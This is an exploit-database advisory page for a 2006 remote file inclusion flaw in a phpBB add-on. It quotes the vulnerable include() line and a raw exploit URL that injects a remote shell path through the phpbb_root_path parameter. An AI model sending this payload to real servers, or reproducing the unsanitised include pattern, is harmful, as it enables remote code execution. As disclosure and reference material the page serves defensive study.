header-logo
Suggest Exploit
vendor:
Random User Registration Number
by:
bd0rk || SOH-Crew
7.5
CVSS
HIGH
File Include Vulnerability
98
CWE
Product Name: Random User Registration Number
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:random_user_registration_number:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'phpbb_root_path' parameter to '/includes/functions_num_image.php' script. This can be exploited to include arbitrary files from remote Web servers and execute arbitrary PHP code.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

- phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability

- bd0rk || SOH-Crew

- URL: http://www.nivisec.com/downloads/phpbb/random_image_register_v100.zip

- Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_random_num_reg.' . $phpEx);

[+] Exploit: /includes/functions_num_image.php?phpbb_root_path=http://[target]/Shell?

Gr33tings: str0ke, TheJT, Lu7k, x0r_32

# milw0rm.com [2006-10-07]

Navigation

Suggest Exploit

Services By CQR